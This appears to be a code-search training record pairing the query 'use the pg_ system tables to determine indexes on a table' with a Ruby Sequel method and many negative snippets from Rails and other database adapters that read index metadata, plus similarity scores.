"def primary_keys(table)\n pks = query(<<-end_sql, 'SCHEMA')\n SELECT DISTINCT attr.attname\n FROM pg_attribute attr\n INNER JOIN pg_depend dep ON attr.attrelid = dep.refobjid AND attr.attnum = dep.refobjsubid\n INNER JOIN pg_constraint cons ON attr.attrelid = cons.conrelid AND attr.attnum = any(cons.conkey)\n WHERE cons.contype = 'p'\n AND dep.refobjid = '#{quote_table_name(table)}'::regclass\n end_sql\n pks.present? ? pks[0] : pks\n end",
"def schema\n execute(<<-eosql).collect { |row| row[0] }.collect { |t| table_schema(t) }\nSELECT rdb$relation_name FROM rdb$relations WHERE rdb$system_flag != 1\neosql\n end",
"def fk_suffix\n @opts[:foreign_key][:suffix]\n end"
] |
[
"0.72586703",
"0.70443857",
"0.7040204",
"0.65597934",
"0.64049715",
"0.6336679",
"0.6077278",
"0.60334164",
"0.60242915",
"0.60242915",
"0.60122025",
"0.5995262",
"0.5981016",
"0.5927055",
"0.5910303",
"0.5858759",
"0.58397806",
"0.5837277",
"0.5833357",
"0.5808299",
"0.579208",
"0.57647914",
"0.57351565",
"0.57138044",
"0.5633697",
"0.5633663",
"0.56320786",
"0.56309414",
"0.5617408",
"0.5592668",
"0.55903906",
"0.55903906",
"0.55762225",
"0.555621",
"0.5551065",
"0.55232054",
"0.5522503",
"0.55138856",
"0.54714763",
"0.54714763",
"0.54692006",
"0.54471195",
"0.54388994",
"0.5434409",
"0.5428107",
"0.5418014",
"0.5417996",
"0.5378057",
"0.5377245",
"0.5377181",
"0.5367812",
"0.5331822",
"0.5326429",
"0.52891374",
"0.5285981",
"0.5257063",
"0.5255529",
"0.52437764",
"0.5234658",
"0.5229042",
"0.5229042",
"0.5206363",
"0.5169734",
"0.51606077",
"0.5159984",
"0.5158775",
"0.5158775",
"0.5152576",
"0.5152576",
"0.5148342",
"0.51432604",
"0.5118049",
"0.5117193",
"0.5117193",
"0.51138026",
"0.50894576",
"0.5088455",
"0.5072457",
"0.50705934",
"0.5068498",
"0.50643027",
"0.5060041",
"0.50255084",
"0.50083715",
"0.49993968",
"0.499779",
"0.49880967",
"0.49783796",
"0.49591783",
"0.49214277",
"0.4919943",
"0.49009892",
"0.48949605",
"0.48936677",
"0.48867992",
"0.48850214",
"0.48826542",
"0.48821062",
"0.48640287",
"0.4845968"
] |
0.7318138
|
0
|
Use the pg_ system tables to determine indexes on a table
|
def indexes(table, opts=OPTS)
  m = output_identifier_meth
  cond = {Sequel[:tab][:oid]=>regclass_oid(table, opts)}
  # Partial indexes (those with an index predicate) are excluded by default.
  cond[:indpred] = nil unless opts[:include_partial]
  indexes = {}
  # Group the per-column rows from the pg_ catalog query into one entry
  # per index, accumulating the ordered column list.
  _indexes_ds.where_each(cond) do |r|
    i = indexes[m.call(r[:name])] ||= {:columns=>[], :unique=>r[:unique], :deferrable=>r[:deferrable]}
    i[:columns] << m.call(r[:column])
  end
  indexes
end
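
A minimal usage sketch (assuming the same hypothetical DB connection and :items table as above); indexes returns a hash keyed by index name.

# One entry per index; :columns preserves the index column order.
DB.indexes(:items).each do |name, idx|
  puts "#{name}: columns=#{idx[:columns].inspect} unique=#{idx[:unique]} deferrable=#{idx[:deferrable]}"
end

# Partial indexes are excluded unless explicitly requested,
# matching the :include_partial option in the method body.
DB.indexes(:items, include_partial: true)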
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def indexes(table_name, name = nil)\n schemas = schema_search_path.split(/,/).map { |p| quote(p) }.join(',')\n \n # Changed from upstread: link to pg_am to grab the index type (e.g. \"gist\")\n result = query(<<-SQL, name)\n SELECT distinct i.relname, d.indisunique, d.indkey, t.oid, am.amname\n FROM pg_class t\n INNER JOIN pg_index d ON t.oid = d.indrelid\n INNER JOIN pg_class i ON d.indexrelid = i.oid\n INNER JOIN pg_attribute a ON a.attrelid = t.oid\n INNER JOIN pg_am am ON i.relam = am.oid\n WHERE i.relkind = 'i'\n AND d.indisprimary = 'f'\n AND t.relname = '#{table_name}'\n AND i.relnamespace IN (SELECT oid FROM pg_namespace WHERE nspname IN (#{schemas}) )\n ORDER BY i.relname\n SQL\n\n indexes = result.map do |row|\n index_name = row[0]\n unique = row[1] == 't'\n indkey = row[2].split(\" \")\n oid = row[3]\n indtype = row[4]\n\n # Changed from upstream: need to get the column types to test for spatial indexes\n columns = query(<<-SQL, \"Columns for index #{row[0]} on #{table_name}\").inject({}) {|attlist, r| attlist[r[1]] = [r[0], r[2]]; attlist}\n SELECT a.attname, a.attnum, t.typname\n FROM pg_attribute a\n INNER JOIN pg_type t ON a.atttypid = t.oid\n WHERE a.attrelid = #{oid}\n AND a.attnum IN (#{indkey.join(\",\")})\n SQL\n\n # Only GiST indexes on spatial columns denote a spatial index\n spatial = indtype == 'gist' && columns.size == 1 && (columns.values.first[1] == 'geometry' || columns.values.first[1] == 'geography')\n\n column_names = indkey.map {|attnum| columns[attnum] ? columns[attnum][0] : nil }.compact\n ActiveRecord::ConnectionAdapters::IndexDefinition.new(table_name, index_name, unique, column_names, spatial)\n end\n end",
"def indexes(table_name, name = nil)\n result = query(<<-SQL, 'SCHEMA')\n SELECT distinct i.relname, d.indisunique, d.indkey, pg_get_indexdef(d.indexrelid), t.oid\n FROM pg_class t\n INNER JOIN pg_index d ON t.oid = d.indrelid\n INNER JOIN pg_class i ON d.indexrelid = i.oid\n WHERE i.relkind = 'i'\n AND d.indisprimary = 'f'\n AND t.relname = '#{table_name}'\n AND i.relnamespace IN (SELECT oid FROM pg_namespace WHERE nspname = ANY (current_schemas(false)) )\n ORDER BY i.relname\n SQL\n\n result.map do |row|\n index_name = row[0]\n unique = row[1] == 't'\n indkey = row[2].split(\" \")\n inddef = row[3]\n oid = row[4]\n\n columns = query(<<-SQL, \"SCHEMA\")\n SELECT a.attnum, a.attname, t.typname\n FROM pg_attribute a, pg_type t\n WHERE a.attrelid = #{oid}\n AND a.attnum IN (#{indkey.join(\",\")})\n AND a.atttypid = t.oid\n SQL\n columns = columns.inject({}){ |h, r| h[r[0].to_s] = [r[1], r[2]]; h }\n column_names = columns.values_at(*indkey).compact.map{ |a| a[0] }\n\n unless column_names.empty?\n # add info on sort order for columns (only desc order is explicitly specified, asc is the default)\n desc_order_columns = inddef.scan(/(\\w+) DESC/).flatten\n orders = desc_order_columns.any? ? Hash[desc_order_columns.map {|order_column| [order_column, :desc]}] : {}\n where = inddef.scan(/WHERE (.+)$/).flatten[0]\n # using = inddef.scan(/USING (.+?) /).flatten[0].to_sym\n\n spatial = inddef =~ /using\\s+gist/i &&\n columns.size == 1 &&\n %w[geometry geography].include?(columns.values.first[1])\n\n # IndexDefinition.new(table_name, index_name, unique, column_names, [], orders, where, nil, using)\n ::RGeo::ActiveRecord::SpatialIndexDefinition.new(table_name, index_name, unique, column_names, [], orders, where, !!spatial)\n end\n end.compact\n end",
"def indexes(table_name, name = nil) #:nodoc:\n schemas = schema_search_path.split(/,/).map { |p| quote(p) }.join(',')\n result = query(<<-SQL, name)\nSELECT i.relname, d.indisunique, a.attname\nFROM pg_class t, pg_class i, pg_index d, pg_attribute a, pg_namespace n\nWHERE i.relkind = 'i'\nAND d.indexrelid = i.oid\nAND d.indisprimary = 'f'\nAND t.oid = d.indrelid\nAND t.relname = '#{table_name}'\nAND a.attrelid = t.oid\nAND n.nspname in (#{schemas})\nAND n.oid = t.relnamespace\nAND ( d.indkey[0]=a.attnum OR d.indkey[1]=a.attnum\nOR d.indkey[2]=a.attnum OR d.indkey[3]=a.attnum\nOR d.indkey[4]=a.attnum OR d.indkey[5]=a.attnum\nOR d.indkey[6]=a.attnum OR d.indkey[7]=a.attnum\nOR d.indkey[8]=a.attnum OR d.indkey[9]=a.attnum )\nORDER BY i.relname\nSQL\n \n current_index = nil\n indexes = []\n \n result.each do |row|\n if current_index != row[0]\n indexes << IndexDefinition.new(table_name, row[0], row[1] == \"t\", [])\n current_index = row[0]\n end\n \n indexes.last.columns << row[2]\n end\n \n indexes\n end",
"def indexes(table_name)\n scope = quoted_scope(table_name)\n\n result = query(<<-SQL, \"SCHEMA\")\n SELECT distinct i.relname, d.indisunique, d.indkey, pg_get_indexdef(d.indexrelid), t.oid,\n pg_catalog.obj_description(i.oid, 'pg_class') AS comment\n FROM pg_class t\n INNER JOIN pg_index d ON t.oid = d.indrelid\n INNER JOIN pg_class i ON d.indexrelid = i.oid\n LEFT JOIN pg_namespace n ON n.oid = i.relnamespace\n WHERE i.relkind = 'i'\n AND d.indisprimary = 'f'\n AND t.relname = #{scope[:name]}\n AND n.nspname = #{scope[:schema]}\n ORDER BY i.relname\n SQL\n\n result.map do |row|\n index_name = row[0]\n unique = row[1]\n indkey = row[2].split(\" \").map(&:to_i)\n inddef = row[3]\n oid = row[4]\n comment = row[5]\n\n using, expressions, where = inddef.scan(/ USING (\\w+?) \\((.+?)\\)(?: WHERE (.+))?\\z/m).flatten\n\n orders = {}\n opclasses = {}\n\n if indkey.include?(0)\n definition = inddef.sub(INDEX_WHERE_EXPRESSION, '')\n\n if column_expression = definition.match(INDEX_COLUMN_EXPRESSION)[1]\n columns = split_expression(expressions).map do |functional_name|\n remove_type(functional_name)\n end\n\n columns = columns.size > 1 ? columns : columns[0]\n end\n else\n columns = Hash[query(<<-SQL.strip_heredoc, \"SCHEMA\")].values_at(*indkey).compact\n SELECT a.attnum, a.attname\n FROM pg_attribute a\n WHERE a.attrelid = #{oid}\n AND a.attnum IN (#{indkey.join(\",\")})\n SQL\n\n # add info on sort order (only desc order is explicitly specified, asc is the default)\n # and non-default opclasses\n expressions.scan(/(?<column>\\w+)\"?\\s?(?<opclass>\\w+_ops)?\\s?(?<desc>DESC)?\\s?(?<nulls>NULLS (?:FIRST|LAST))?/).each do |column, opclass, desc, nulls|\n opclasses[column] = opclass.to_sym if opclass\n if nulls\n orders[column] = [desc, nulls].compact.join(\" \")\n else\n orders[column] = :desc if desc\n end\n end\n end\n\n IndexDefinition.new(\n table_name,\n index_name,\n unique,\n columns,\n orders: orders,\n opclasses: opclasses,\n where: where,\n using: using.to_sym,\n comment: comment.presence\n )\n end\n end",
"def indexes(table_name, name = nil)\n schemas = schema_search_path.split(/,/).map { |p| quote(p) }.join(',')\n result = query(<<-SQL, name)\n SELECT i.relname, d.indisunique, d.indkey, t.oid, am.amname\n FROM pg_class t, pg_class i, pg_index d, pg_attribute a, pg_am am\n WHERE i.relkind = 'i'\n AND d.indexrelid = i.oid\n AND d.indisprimary = 'f'\n AND t.oid = d.indrelid\n AND i.relam = am.oid\n AND t.relname = '#{table_name}'\n AND a.attrelid = t.oid\n AND ( d.indkey[0]=a.attnum OR d.indkey[1]=a.attnum\n OR d.indkey[2]=a.attnum OR d.indkey[3]=a.attnum\n OR d.indkey[4]=a.attnum OR d.indkey[5]=a.attnum\n OR d.indkey[6]=a.attnum OR d.indkey[7]=a.attnum\n OR d.indkey[8]=a.attnum OR d.indkey[9]=a.attnum )\n ORDER BY i.relname\n SQL\n\n indexes = []\n\n indexes = result.map do |row|\n index_name = row[0]\n unique = row[1] == 't'\n indkey = row[2].split(\" \")\n oid = row[3]\n spatial = row[4] == \"gist\"\n\n columns = query(<<-SQL, \"Columns for index #{row[0]} on #{table_name}\").inject({}) {|attlist, r| attlist[r[1]] = r[0]; attlist}\n SELECT a.attname, a.attnum\n FROM pg_attribute a\n WHERE a.attrelid = #{oid}\n AND a.attnum IN (#{indkey.join(\",\")})\n SQL\n\n column_names = indkey.map {|attnum| columns[attnum] }\n ActiveRecord::ConnectionAdapters::IndexDefinition.new(table_name, index_name, unique, column_names, spatial)\n end\n\n indexes\n end",
"def get_indexes\n table_cond = @files ? \"AND r.relname IN (#{@files.map{|(t,f)|\"'#{t}'\"}.join(', ')})\" : ''\n results = query(<<-SQL)\n SELECT\n r.relname,\n i.relname,\n ri.indisprimary,\n pg_get_indexdef(i.oid)\n FROM\n pg_class r,\n pg_class i,\n pg_index ri\n WHERE\n ri.indexrelid = i.oid\n AND ri.indrelid = r.oid\n AND r.relkind = 'r'\n AND i.relkind = 'i'\n AND r.relnamespace = (SELECT oid FROM pg_namespace WHERE nspname = '#{@config[:schema]}')\n #{table_cond}\n SQL\n\n hash = Hash.new(){|hash, key| hash.store(key, [])}\n results.each do |row|\n table, index, primary_key, create_sql = row.split(/\\t/)\n hash[table] << {:index => index, :primary_key => primary_key == 't', :create_sql => create_sql}\n end\n hash\n end",
"def indexes(table_name, name = nil)\n # NOTE: maybe it's better to leave things of to the JDBC API ?!\n result = select_rows(<<-SQL, 'SCHEMA')\n SELECT distinct i.relname, d.indisunique, d.indkey, pg_get_indexdef(d.indexrelid), t.oid\n FROM pg_class t\n INNER JOIN pg_index d ON t.oid = d.indrelid\n INNER JOIN pg_class i ON d.indexrelid = i.oid\n WHERE i.relkind = 'i'\n AND d.indisprimary = 'f'\n AND t.relname = '#{table_name}'\n AND i.relnamespace IN (SELECT oid FROM pg_namespace WHERE nspname = ANY (current_schemas(false)) )\n ORDER BY i.relname\n SQL\n\n result.map! do |row|\n index_name = row[0]\n unique = row[1].is_a?(String) ? row[1] == 't' : row[1] # JDBC gets us a boolean\n # NOTE: this hack should no longer be needed ...\n # indkey = row[2].is_a?(Java::OrgPostgresqlUtil::PGobject) ? row[2].value : row[2]\n # indkey = indkey.split(\" \")\n indkey = row[2].split(' ')\n inddef = row[3]\n oid = row[4]\n\n columns = select_rows(<<-SQL, \"SCHEMA\")\n SELECT a.attnum, a.attname\n FROM pg_attribute a\n WHERE a.attrelid = #{oid}\n AND a.attnum IN (#{indkey.join(\",\")})\n SQL\n\n columns = Hash[ columns.each { |column| column[0] = column[0].to_s } ]\n column_names = columns.values_at(*indkey).compact\n\n unless column_names.empty?\n # add info on sort order for columns (only desc order is explicitly specified, asc is the default)\n desc_order_columns = inddef.scan(/(\\w+) DESC/).flatten\n orders = desc_order_columns.any? ? Hash[ desc_order_columns.map { |column| [column, :desc] } ] : {}\n\n if ::ActiveRecord::VERSION::MAJOR > 3 # AR4 supports `where` and `using` index options\n where = inddef.scan(/WHERE (.+)$/).flatten[0]\n using = inddef.scan(/USING (.+?) /).flatten[0].to_sym\n\n IndexDefinition.new(table_name, index_name, unique, column_names, [], orders, where, nil, using)\n else\n new_index_definition(table_name, index_name, unique, column_names, [], orders)\n end\n end\n end\n result.compact!\n result\n end",
"def indexes(table_name)\n\n # FIXME: AR version => table = Utils.extract_schema_qualified_name(table_name.to_s)\n schema, table = extract_schema_and_table(table_name.to_s)\n\n result = query(<<-SQL, 'SCHEMA')\n SELECT distinct i.relname, d.indisunique, d.indkey, pg_get_indexdef(d.indexrelid), t.oid,\n pg_catalog.obj_description(i.oid, 'pg_class') AS comment\n FROM pg_class t\n INNER JOIN pg_index d ON t.oid = d.indrelid\n INNER JOIN pg_class i ON d.indexrelid = i.oid\n LEFT JOIN pg_namespace n ON n.oid = i.relnamespace\n WHERE i.relkind = 'i'\n AND d.indisprimary = 'f'\n AND t.relname = '#{table}'\n AND n.nspname = #{schema ? \"'#{schema}'\" : 'ANY (current_schemas(false))'}\n ORDER BY i.relname\n SQL\n\n result.map do |row|\n index_name = row[0]\n # FIXME: These values [1,2] are returned in a different format than AR expects, maybe we could update it on the Java side to be more accurate\n unique = row[1].is_a?(String) ? row[1] == 't' : row[1] # JDBC gets us a boolean\n indkey = row[2].is_a?(Java::OrgPostgresqlUtil::PGobject) ? row[2].value : row[2]\n indkey = indkey.split(\" \").map(&:to_i)\n inddef = row[3]\n oid = row[4]\n comment = row[5]\n\n using, expressions, where = inddef.scan(/ USING (\\w+?) \\((.+?)\\)(?: WHERE (.+))?\\z/m).flatten\n\n orders = {}\n opclasses = {}\n\n if indkey.include?(0)\n columns = expressions\n else\n columns = Hash[query(<<-SQL.strip_heredoc, \"SCHEMA\")].values_at(*indkey).compact\n SELECT a.attnum, a.attname\n FROM pg_attribute a\n WHERE a.attrelid = #{oid}\n AND a.attnum IN (#{indkey.join(\",\")})\n SQL\n\n # add info on sort order (only desc order is explicitly specified, asc is the default)\n # and non-default opclasses\n expressions.scan(/(?<column>\\w+)\\s?(?<opclass>\\w+_ops)?\\s?(?<desc>DESC)?\\s?(?<nulls>NULLS (?:FIRST|LAST))?/).each do |column, opclass, desc, nulls|\n opclasses[column] = opclass.to_sym if opclass\n if nulls\n orders[column] = [desc, nulls].compact.join(' ')\n elsif desc\n orders[column] = :desc\n end\n end\n end\n\n IndexDefinition.new(\n table_name,\n index_name,\n unique,\n columns,\n orders: orders,\n opclasses: opclasses,\n where: where,\n using: using.to_sym,\n comment: comment.presence\n )\n end\n end",
"def table_indexes(table)\n ActiveRecord::Base.connection.indexes(table)\n end",
"def table_indexes(table)\n ActiveRecord::Base.connection.indexes(table)\n end",
"def indexes\n select_all( <<-SQL\n SELECT\n t.relname AS table,\n ix.relname AS name,\n regexp_replace(pg_get_indexdef(indexrelid), '^[^\\\\(]*\\\\((.*)\\\\)$', '\\\\1') AS columns,\n regexp_replace(pg_get_indexdef(indexrelid), '.* USING ([^ ]*) \\\\(.*', '\\\\1') AS using,\n indisunique AS unique,\n indisprimary AS primary,\n indisvalid AS valid,\n indexprs::text,\n indpred::text,\n pg_get_indexdef(indexrelid) AS definition\n FROM\n pg_index i\n INNER JOIN\n pg_class t ON t.oid = i.indrelid\n INNER JOIN\n pg_class ix ON ix.oid = i.indexrelid\n ORDER BY\n 1, 2\n SQL\n ).map { |v| v[\"columns\"] = v[\"columns\"].sub(\") WHERE (\", \" WHERE \").split(\", \"); v }\n end",
"def indexes(table_name, name = nil)#:nodoc:\n indexes = []\n current_index = nil\n (execute(\"SHOW KEYS FROM #{table_name}\", name) || []).each do |row|\n if current_index != row[2]\n next if row[2] == \"PRIMARY\" # skip the primary key\n current_index = row[2]\n indexes << ActiveRecord::ConnectionAdapters::IndexDefinition.new(row[0], row[2], row[1] == \"0\", [], row[10] == \"SPATIAL\")\n end\n indexes.last.columns << row[4]\n end\n indexes\n end",
"def indexes(table_name, name = nil)\n (owner, table_name) = @connection.describe(table_name)\n unless all_schema_indexes\n result = select_all(<<-SQL)\n SELECT lower(i.table_name) as table_name, lower(i.index_name) as index_name, i.uniqueness, lower(c.column_name) as column_name\n FROM all_indexes i, all_ind_columns c\n WHERE i.owner = '#{owner}'\n AND i.table_owner = '#{owner}'\n AND c.index_name = i.index_name\n AND c.index_owner = i.owner\n AND NOT EXISTS (SELECT uc.index_name FROM all_constraints uc WHERE uc.index_name = i.index_name AND uc.owner = i.owner AND uc.constraint_type = 'P')\n ORDER BY i.index_name, c.column_position\n SQL\n \n current_index = nil\n self.all_schema_indexes = []\n \n result.each do |row|\n # have to keep track of indexes because above query returns dups\n # there is probably a better query we could figure out\n if current_index != row['index_name']\n self.all_schema_indexes << ::ActiveRecord::ConnectionAdapters::IndexDefinition.new(row['table_name'], row['index_name'], row['uniqueness'] == \"UNIQUE\", [])\n current_index = row['index_name']\n end\n \n self.all_schema_indexes.last.columns << row['column_name']\n end\n end\n \n # Return the indexes just for the requested table, since AR is structured that way\n table_name = table_name.downcase\n all_schema_indexes.select{|i| i.table == table_name}\n end",
"def indexes(table_name, name = nil)\n result = query(\"exec sp_helpindex '#{table_name}'\", name)\n \n indexes = []\n result.each do |row|\n if row[1].match('primary key') == nil\n indexes << IndexDefinition.new(table_name, row[0], row[1].match('unique') != nil, row[2].split(',').each {|x| x.strip!})\n end\n end\n \n indexes\n end",
"def indexes(_table_name, _name = nil)\n []\n end",
"def indexes\n @indexes ||= connection.indexes(table_name)\n end",
"def indexes(table_name, name = nil)\n opclasses\n result = select_rows(<<-SQL, name)\n SELECT distinct i.relname, d.indisunique, d.indkey, pg_get_indexdef(d.indexrelid), t.oid\n FROM pg_class t\n INNER JOIN pg_index d ON t.oid = d.indrelid\n INNER JOIN pg_class i ON d.indexrelid = i.oid\n WHERE i.relkind = 'i'\n AND d.indisprimary = 'f'\n AND t.relname = '#{table_name}'\n AND i.relnamespace IN (SELECT oid FROM pg_namespace WHERE nspname = ANY (current_schemas(false)) )\n ORDER BY i.relname\n SQL\n result.map do |row|\n index_name = row[0]\n unique = row[1] == 't'\n indkey = row[2].split(\" \")\n inddef = row[3]\n oid = row[4]\n\n columns = Hash[select_rows(<<-SQL, \"Columns for index #{row[0]} on #{table_name}\")]\n SELECT a.attnum::text, a.attname\n FROM pg_attribute a\n WHERE a.attrelid = #{oid}\n AND a.attnum IN (#{indkey.join(\",\")})\n SQL\n column_names = columns.values_at(*indkey).compact\n\n # add info on sort order for columns (only desc order is explicitly specified, asc is the default)\n desc_order_columns = inddef.scan(/(\\w+) DESC/).flatten\n orders = desc_order_columns.any? ? Hash[desc_order_columns.map {|order_column| [order_column, :desc]}] : {}\n #changed from rails 3.2\n where = inddef.scan(/WHERE (.+)$/).flatten[0]\n index_type = inddef.scan(/USING (.+?) /).flatten[0].to_sym\n if index_type\n index_op = inddef.scan(/USING .+? \\(.+? (#{opclasses.join('|')})\\)/).flatten\n index_op = index_op[0].to_sym if index_op.present?\n end\n if column_names.present?\n index_def = IndexDefinition.new(table_name, index_name, unique, column_names, [], orders)\n index_def.where = where\n index_def.index_type = index_type if index_type && index_type != :btree\n index_def.index_opclass = index_op if index_type && index_type != :btree && index_op\n index_def\n # else nil\n end\n #/changed\n end.compact\n end",
"def indexes(table_name)\n data = select(\"EXEC sp_helpindex #{quote(table_name)}\", \"SCHEMA\") rescue []\n\n data.reduce([]) do |indexes, index|\n index = index.with_indifferent_access\n\n if index[:index_description] =~ /primary key/\n indexes\n else\n name = index[:index_name]\n unique = index[:index_description].to_s.match?(/unique/)\n where = select_value(\"SELECT [filter_definition] FROM sys.indexes WHERE name = #{quote(name)}\")\n orders = {}\n columns = []\n\n index[:index_keys].split(',').each do |column|\n column.strip!\n\n if column.ends_with?('(-)')\n column.gsub! '(-)', ''\n orders[column] = :desc\n end\n\n columns << column\n end\n\n indexes << IndexDefinition.new(table_name, name, unique, columns, where: where, orders: orders)\n end\n end\n end",
"def indexes(table_name)\n idxs = {}\n results = fetch('show indexes from ' + table_name.to_s).all\n results.each do |idx_entry|\n idx_name = idx_entry[:Name].to_sym\n next if idx_name == :primary # ignore primary index\n idxs[idx_name] ||= { name: idx_name.to_s }\n idx = idxs[idx_name]\n idx[:unique] = idx_entry[:Unique]\n idx[:deferrable] = false\n idx[:columns] ||= []\n idx[:columns] << idx_entry[:Column].to_sym unless idx_entry[:Implicit]\n end\n idxs\n end",
"def indexes(table_name, name = nil)\n select_rows(\n \"SELECT index_name, \"+\n \" is_unique \"+\n \"FROM information_schema.indexes \"+\n \"WHERE table_schema = CURRENT_SCHEMA \"+\n \" AND table_name = '#{quote_string(table_name.to_s)}' \"+\n \" AND index_type <> 'PRIMARY' \"+\n \"ORDER BY index_name\",\n name || SCHEMA_LOG_NAME\n ).map { |row|\n cols = select_rows(\n \"SELECT column_name \"+\n \"FROM information_schema.index_columns \"+\n \"WHERE index_table_schema = CURRENT_SCHEMA \"+\n \" AND index_table_name = '#{quote_string(table_name.to_s)}' \"+\n \" AND index_name = '#{quote_string(row[0])}' \"+\n \"ORDER BY ordinal_position\",\n name || SCHEMA_LOG_NAME\n ).map { |col_row|\n col_row[0]\n }\n IndexDefinition.new(table_name, row[0], row[1] == 'YES', cols, [], {})\n }\n end",
"def indexes(table_name, _name = nil)\n stmt = @connection.indexes(native_case(table_name.to_s))\n result = stmt.fetch_all || []\n stmt.drop unless stmt.nil?\n\n index_cols = []\n index_name = nil\n unique = nil\n\n result.each_with_object([]).with_index do |(row, indices), row_idx|\n # Skip table statistics\n next if row[6].zero? # SQLStatistics: TYPE\n\n if row[7] == 1 # SQLStatistics: ORDINAL_POSITION\n # Start of column descriptor block for next index\n index_cols = []\n unique = row[3].zero? # SQLStatistics: NON_UNIQUE\n index_name = String.new(row[5]) # SQLStatistics: INDEX_NAME\n end\n\n index_cols << format_case(row[8]) # SQLStatistics: COLUMN_NAME\n next_row = result[row_idx + 1]\n\n if (row_idx == result.length - 1) || (next_row[6].zero? || next_row[7] == 1)\n indices << ActiveRecord::ConnectionAdapters::IndexDefinition.new(table_name, format_case(index_name), unique, index_cols)\n end\n end\n end",
"def indexes(table_name, _name = nil)\n stmt = @connection.indexes(native_case(table_name.to_s))\n result = stmt.fetch_all || []\n stmt.drop unless stmt.nil?\n\n index_cols = []\n index_name = nil\n unique = nil\n\n result.each_with_object([]).with_index do |(row, indices), row_idx|\n # Skip table statistics\n next if row[6].zero? # SQLStatistics: TYPE\n\n if row[7] == 1 # SQLStatistics: ORDINAL_POSITION\n # Start of column descriptor block for next index\n index_cols = []\n unique = row[3].zero? # SQLStatistics: NON_UNIQUE\n index_name = String.new(row[5]) # SQLStatistics: INDEX_NAME\n end\n\n index_cols << format_case(row[8]) # SQLStatistics: COLUMN_NAME\n next_row = result[row_idx + 1]\n\n if (row_idx == result.length - 1) || (next_row[6].zero? || next_row[7] == 1)\n indices << ActiveRecord::ConnectionAdapters::IndexDefinition.new(table_name, format_case(index_name), unique, index_cols)\n end\n end\n end",
"def indexes(table_name, name = nil) #:nodoc:\r\n sql = \"SELECT name, INDEX_OPTIONS & 1 AS [unique], index_expression FROM SYSTEM.INDEXES WHERE parent = '#{table_name}'\"\r\n select(sql, name).map do |row|\r\n index = IndexDefinition.new(table_name, row['name'])\r\n index.unique = row['unique'] == 1\r\n index.columns = row['index_expression']\r\n index\r\n end\r\n end",
"def indexes\n @indexes ||= connection.indexes(table_name, \"#{name} Indexes\")\n end",
"def indexes(table_name, name = nil)\n []\n end",
"def indexes(table_name, name = nil)\n []\n end",
"def indexes(table_name,opts=OPTS)\n m = output_identifier_meth\n idxs = ado_schema_indexes(table_name).inject({}) do |memo, idx|\n unless idx[\"PRIMARY_KEY\"]\n index = memo[m.call(idx[\"INDEX_NAME\"])] ||= {\n :columns=>[], :unique=>idx[\"UNIQUE\"]\n }\n index[:columns] << m.call(idx[\"COLUMN_NAME\"])\n end\n memo\n end\n idxs\n end",
"def indexes(table_name, name = nil)\n result = @connection.indexes.values.select {|ix| ix.table_name == table_name && ix.index_name !~ /^rdb\\$/ }\n indexes = result.map {|ix| IndexDefinition.new(table_name, ix.index_name, ix.unique, ix.columns) }\n indexes\n end",
"def create_hypothetical_index(table, col_set)\n execute(\"SELECT * FROM hypopg_create_index('CREATE INDEX ON #{quote_ident(table)} (#{col_set.map {|c| quote_ident(c[:column])}.join(\", \")})')\").first[\"indexname\"]\n end",
"def get_indices\n @conn.query({url_path: \"#{database}/_index\", method: :get})\n end",
"def build_indexes\n Schema::Physical::Indexes.new\n end",
"def indexes(table, stream)\n if (indexes = @connection.indexes(table)).any?\n add_index_statements = indexes.map do |index|\n statement_parts = [\n ('add_index ' + index.table.inspect),\n index.columns.inspect,\n (':name => ' + index.name.inspect),\n ]\n statement_parts << ':unique => true' if index.unique\n\n index_lengths = (index.lengths || []).compact\n statement_parts << (':length => ' + Hash[index.columns.zip(index.lengths)].inspect) unless index_lengths.empty?\n\n index_orders = (index.orders || {})\n statement_parts << (':order => ' + index.orders.inspect) unless index_orders.empty?\n\n # changed from rails 2.3\n statement_parts << (':where => ' + index.where.inspect) if index.where\n statement_parts << (':index_type => ' + index.index_type.inspect) if index.index_type\n statement_parts << (':index_opclass => ' + index.index_opclass.inspect) if index.index_opclass.present?\n # /changed\n\n ' ' + statement_parts.join(', ')\n end\n\n stream.puts add_index_statements.sort.join(\"\\n\")\n stream.puts\n end\n end",
"def create_indexes\n source_attributes = self.base_class.attributes\n self.indexes.each do |name, index|\n opts = {:table_name => index.table_name, :id => :id}\n if index.range_key?\n if index.range_keys.select{|v| !source_attributes[v].nil? && source_attributes[v][:type] == :string}.any?\n opts[:range_key] = { :range => :string }\n else\n opts[:range_key] = { :range => :number }\n end\n else\n opts[:range_key] = nil\n end\n self.create_table(opts)\n end\n end",
"def indexes_per_table\n 65_535\n end",
"def load_physical_schema(conn, builder)\n builder.indexes{\n conn.tables.each{|table|\n conn.indexes(table).each_pair{|name, defn|\n next if defn[:unique]\n builder.index(name, {:relvar => table, :attributes => defn[:columns]})\n }\n }\n }\n end",
"def create_table_indices(klass)\n for idx in sql_indices_for_class(klass)\n anno = klass.ann(idx)\n idx = idx.to_s\n pre_sql, post_sql = klass.ann(idx, :pre_index), klass.ann(idx, :post_index)\n idxname = idx.gsub(/ /, \"\").gsub(/,/, \"_\").gsub(/\\(.*\\)/, \"\")\n sql = \"CREATE #{pre_sql} INDEX #{klass.table}_#{idxname}_idx #{post_sql} ON #{klass.table} (#{idx})\"\n exec(sql)\n end\n end",
"def indexes\n raise 'not implemented'\n end",
"def create_indexes\n indexes = %w{ Page(page_id) Trait(eol_pk) Trait(resource_pk) Term(uri) Term(name)\n Resource(resource_id) MetaData(eol_pk)}\n indexes.each do |index|\n begin\n query(\"CREATE INDEX ON :#{index};\")\n rescue Neography::NeographyError => e\n if e.to_s =~ /already created/\n puts \"Already have an index on #{index}, skipping.\"\n else\n raise e\n end\n end\n end\n end",
"def import_indexes( table )\n # Foreign keys also automatically create indexes, which we must exclude when importing.\n # But only if they look like indexes named by the automatic foreign key naming convention.\n foreign_key_indexes = table.foreign_keys.map{ |x| x.columns if x.columns.size == 1 }.compact\n for name, opts in db.indexes( table.name )\n opts = opts.dup\n opts[ :name ] = name\n columns = opts.delete( :columns )\n next if ( ! opts[ :unique ] ) && foreign_key_indexes.include?( columns ) && name == columns.first\n # Sequel currently doesn't provide info about fulltext indexes, so we have to rely on properly used names.\n opts[ :type ] = :full_text if name =~ /_fulltext$/\n opts.delete( :deferrable ) unless opts[ :deferrable ]\n table.add_index( columns, opts )\n end\n end",
"def index_sql_list(table_name, indexes)\n indexes.map{|i| index_definition_sql(table_name, i)}\n end",
